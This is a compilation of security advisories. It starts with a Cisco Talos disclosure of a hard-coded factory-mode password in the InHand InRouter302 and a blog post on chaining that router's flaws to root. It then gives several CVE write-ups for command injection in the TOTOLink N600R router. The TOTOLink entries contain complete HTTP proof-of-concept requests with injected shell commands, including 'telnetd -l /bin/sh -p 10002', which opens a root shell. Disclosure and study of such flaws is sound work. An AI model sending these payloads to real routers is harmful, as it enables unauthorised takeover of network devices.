A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

**CWE**

CWE-259 - Use of Hard-coded Password

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers the telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
      infactory      -- factory mode
    Router> 
    

A low-privileged user can login into this service. The Router console contains a command, called infactory. This functionality will request a password; if correct, a menu with several functions is accessed.

The infactory_command:

    undefined4 infactory_command(undefined4 param_1,char *provided_password)
    
    {
     [...]
    
      if ((provided_password == (char *)0x0) || (*provided_password == '\0')) {
        provided_password = password_in_stack;
        uVar2 = get_help_string("input_pass");
        get_pass_wrap(uVar2,provided_password,0x40);
      }
      aes_decrypt_str(<REDACTED>,0x40,decrypted_password,0x80);                                             [1]
      password_len = strlen(decrypted_password);
      iVar1 = strncmp(decrypted_password,provided_password,password_len);                                   [2]
      if (iVar1 == 0) {
        change_view(view_cursor,&view_infactory);                                                           [3]
        return 0;
      }
      [...]
    }
    

This function will first, at [1], decrypt a hard-coded hex encoded string. Then, if the comparison between the described string and the provided password, at [2], returns zero, meaning the two string are equal, then the code at [3] will be reached. Then the “view” will be changed, which means that the available commands will change.

The aes_decrypt_str:

    undefined4 aes_decrypt_str(char *data,uint data_len,char *output_buff)
    {
      [...]
      IV._0_4_ = 0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      if ((data_len & 0x1f) == 0) {
        __size = (int)data_len / 2;
        data_bin = malloc(__size);
        if (data_bin == (void *)0x0) {
          syslog(3,"out of memory!");
          uVar1 = 0xffffffff;
        }
        else {
          str2bin(data,__size,data_bin);
          AES_set_key(AES_key,<REDACTED>,128);                                                              [4]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_bin,output_buff,__size,IV,0);
          free(data_bin);
        }
      }
      [...]
    }
    

The hard-coded data provided at [1] are decrypted, at [4], using AES with a hard-coded key. An attacker, in possession of low-privileged user credentials, would be able to access the infactory functionalities.

**Exploit Proof of Concept**

Using the infactory command and providing the correct password will list the infactory functionalities:

    Router> infactory
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      exit           -- exit current mode/console
      reboot         -- reboot system
      factory-model  -- hardware model configure
      modem          -- modem test
      reset-key      -- check the status of the reset button
      com            -- detecting serial ports
      port           -- FCT network port test
      net            -- complete machine network port test
      led            -- LED lights test
      wlan           -- Wi-Fi test
      mem            -- check memory
      hw_wdg         -- check the hardware watchdog status
      dio            -- detect digital I/O
      stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-28 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-27172: TALOS-2022-1496 || Cisco Talos Intelligence Group

Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Francesco Benvenuto and Jon Munshaw. 
Cisco Talos recently discovered several vulnerabilities in InHand Networks’ InRouter302 that could allow an attacker to escalate their privileges on the targeted device from a...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities. Blog by Francesco Benvenuto and Jon Munshaw._ 

Cisco Talos recently discovered several vulnerabilities in InHand Networks’ InRouter302 that could allow an attacker to escalate their privileges on the targeted device from a non-privileged user to a privileged one. There are also multiple vulnerabilities that could allow an adversary to reach unconstrained root privileges. The router has one privileged user and several non-privileged ones. 

The InRouter is an industrial LTE router that includes remote management functionalities and several security protection mechanisms, such as VPN connections and a firewall. 

The router can be managed mainly in two ways: through the web interface, and through a router console accessible by telnet or, if enabled, SSH. The router does not provide access in any way to the Linux system beneath the router functionalities. 

The chart below, which includes only a subset of all the discovered vulnerabilities, shows the different paths an attacker could take to obtain root access after the user clicks on an attacker-controlled link. It would be possible to chain the vulnerabilities discovered in several ways to obtain root access on the device:

Cisco Talos worked with InHand Networks to ensure that this issue is resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.  

To avoid the exploitation of these vulnerabilities, users are encouraged to update InHand Networks InRouter302, version 3.5.4 and 3.5.37 to version 3.5.45. Note that most vulnerabilities exist in both versions, however, several vulnerabilities are unique to 3.5.37 due to newly introduced functionality. See below for details. Talos tested and confirmed these versions are affected by these vulnerabilities. For more information on each of these issues, read their full advisories, which are linked in the blog post below.

Additionally, the following SNORTⓇ rules will detect exploitation attempts against this vulnerability: 59125, 59151, 59153, 59224-59225, 59247, 59270 – 59272, 59287, 59288, 59294, 59295 and 59414. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

Talos hypothesizes a scenario where the attacker would start the chain attack from a malicious link. This can be achieved through social engineering attacks, such as phishing. 

If a victim clicks the malicious link their session cookie can be exfiltrated: 

*   TALOS-2022-1469, together with TALOS-2022-1470: The webserver uses for its web pages a template language. One of the web pages that use this template language executes one parameter set internally by the webserver as JavaScript during the handling of a request. These issues are related to the possibility to provide in the request the value of this parameter, effectively allowing to execute arbitrary JavaScript with an HTTP request. This enables an attacker to execute a cross-site scripting attack (XSS). Because no HttpOnly flag is set, the attacker could exfiltrate the session cookie, exploiting the XSS. 

At this point, the attacker has either the cookie of a non-privileged user or a privileged one. In both scenarios, there are direct paths to root: 

*   TALOS-2022-1477: The router console, the binary users interact with when they SSH/telnet into the device, has a hidden command. When provided with a specific password, this command will spawn a root shell. The provided password is compared with a string that will be decrypted using AES, but because the AES key is in the library used, the encrypted password can be decrypted. 
*   TALOS-2022-1478: In the same hidden command within the router console, if a different password is provided, it will spawn a new binary. This binary is vulnerable to a command injection vulnerability, leading to the execution of OS commands as root. 
*   TALOS-2022-1481: It is also possible to upload a bulk router configuration. If the import is performed with this method, no check on the configuration entries value is performed. This leads to break assumptions where these values are used and can cause buffer overflows that can lead to remote code execution. 

If the cookie exfiltrated is of a non-privileged user, and we do not consider that we can already obtain root from that level of privilege, the attacker can perform a privilege escalation to obtain the “privileged user” state: 

*   TALOS-2022-1472: The non-privileged user can upload the router configurations, change the privileged user password, and place its credential in a known state. 
*   TALOS-2022-1474: The non-privileged user can download the router configurations as a file. In it, there is the privileged user AES encrypted password, but because the AES password is contained in the library used by the device to encrypt and decrypt, the AES encrypted password can be decrypted by the attacker, that will obtain the privileged user credentials. 

The privileged user can then perform more functionalities than the non-privileged user, but it still does not have access to the Linux system of the router. From the “privileged user” state, there are several vulnerabilities that lead to root and some, in common with the “non-privileged user” state, were discussed earlier. Still, the following ones are unique for the “privileged user”: 

*   TALOS-2022-1475: Inside the router console, there is a “privileged view” only accessible using the privileged user password. In this view, there is a hidden command that is vulnerable to command injection. 
*   TALOS-2022-1476: In the same hidden command within the router console, there is a buffer overflow vulnerability that can lead to remote code execution. 

These examples show a few possible routes that these vulnerabilities could be leveraged to go from a single click to root access within the device. Once root access to the router is obtained any number of effects can be achieved including, but not limited to, injecting, dropping, or inspecting packets, DNS poisoning, or further pivoting into the network. 

Additional vulnerabilities have been identified (TALOS-2022-1468, TALOS-2022-1471, TALOS-2022-1473, TALOS-2022-1495) that are not part of a chain shown: 

*   TALOS-2022-1468: An issue that allows an attacker to upload arbitrary files. With this capability, an attacker could perform several malicious actions. For instance, for both non-privileged and privileged users, the attacker could change the file that forces the router console to spawn when connecting to telnet or SSH, specifying instead to spawn a root shell. 
*   TALOS-2022-1471: This is a file-parsing issue. The functionality exposed starts the parsing of a file that is assumed to be a standard ping output. If an attacker has the ability to control the content of this file, they could trigger a buffer overflow that can lead to remote code execution. This vulnerability is reachable only by a privileged user. 
*   TALOS-2022-1473: If a specific web page is requested, a specific router configuration is taken and used as part of an OS command. Leading to command injection vulnerability. 
*   TALOS-2022-1495: The binary that manages the firmware upgrade only checks its CRC. Is possible, for both non-privileged and privileged users, to perform a firmware update with any firmware that has a valid CRC. 

During our disclosure to the vendor a new firmware, version 3.5.37, was released, and we discovered TALOS-2022-1496, TALOS-2022-1499, TALOS-2022-1500, TALOS-2022-1501, in this new firmware. These problems are related to a new “privileged view” in the router console. The password for accessing it was hardcoded in the same way as TALOS-2022-1477. This view introduced new functionalities, although three of them contained command injection vulnerabilities. 

TALOS-2022-1496 (CVE-2022-27172) is a vulnerability in the hard-coded password on the device, while the other three vulnerabilities all exist in different functions of the router’s software.

Vulnerability Spotlight: How an attacker could chain several vulnerabilities in an industrial wireless router to gain root access 

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/setUploadSetting.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the filename function to V6, then formats the matched content into V33 through the sprintf function, and then brings V33 into getcmdstr

At this time, the corresponding parameter A1 is finally brought into the Popen function, and there is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 102
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {"topicurl":"setting/setUploadSetting",
    "FileName":"test1$(ls>/tmp/10.txt;)",
    "ContentLength":"1"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28913: IOT_vuln/TOTOLink/N600R/10 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/CloudACMunualUpdate.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the contents obtained by the filename parameter to V8, then copies V8 into the stack of V15 through the strcpy function, and then brings V15 into update\_ In FW function

At this time, the corresponding parameter is A2

Function A2 formats the matched content into the stack of V11 through the sprintf function, and then brings V11 into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 86
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/CloudACMunualUpdate",
    	"FileName":"test$(ls > /tmp/9.txt)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28911: IOT_vuln/TOTOLink/N600R/7 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicename parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the devicename parameter to V7, then passes the matching content to v18 through the sprintf function, and finally executes the content in v18 through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"1",
    	"deviceName":"';telnetd -l /bin/sh -p 10002;'“
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28910: IOT_vuln/TOTOLink/N600R/9 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the webwlanidx parameter in /setting/setWebWlanIdx.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the webwlanidx parameter is passed to V5, and then the matching content is passed to V7 through the sprintf function, and then V7 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setWebWlanIdx",
    	"webWlanIdn":"0test$(ls>/tmp/4.txt;)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28909: IOT_vuln/TOTOLink/N600R/3 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicemac parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the devicemac parameter is passed to V6, and then the content matched by V6 is formatted into v18 through the sprintf function. Finally, v18 is executed through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"';telnetd -l /bin/sh -p 10002;'",
    	"deviceName":"zoe"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

Tag

#telnet